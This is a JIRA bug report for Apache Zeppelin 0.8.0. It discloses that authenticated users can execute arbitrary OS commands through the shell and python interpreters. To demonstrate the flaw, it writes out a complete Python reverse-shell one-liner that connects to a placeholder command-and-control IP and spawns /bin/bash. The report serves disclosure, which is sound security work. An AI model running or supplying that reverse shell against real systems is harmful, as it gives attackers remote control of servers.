GuruRaj created ZEPPELIN-4287:
---------------------------------

             Summary: Remote Code Execution
                 Key: ZEPPELIN-4287
                 URL: https://issues.apache.org/jira/browse/ZEPPELIN-4287
             Project: Zeppelin
          Issue Type: Bug
          Components: Interpreters
    Affects Versions: 0.8.0
            Reporter: GuruRaj
         Attachments: rce_1.png

Hi Team,
 
We have noticed that zeppelin is vulnerable to Remote code execution, where 
authenticated user will be able to execute arbitrary code on the server with 
help of Interpreter.
 
Case1: User can select the shell interpreter and execute the OS command 
directly and can get the reverse shell from there if needed.
 
Case2: User can select any other interrupter like python and get to execute the 
OS commands from there. For example we can get the reverse shell from the below 
code
python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<c&c
 ip>",<port no>));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' 
 



--
This message was sent by Atlassian JIRA
(v7.6.14#76016)

Reply via email to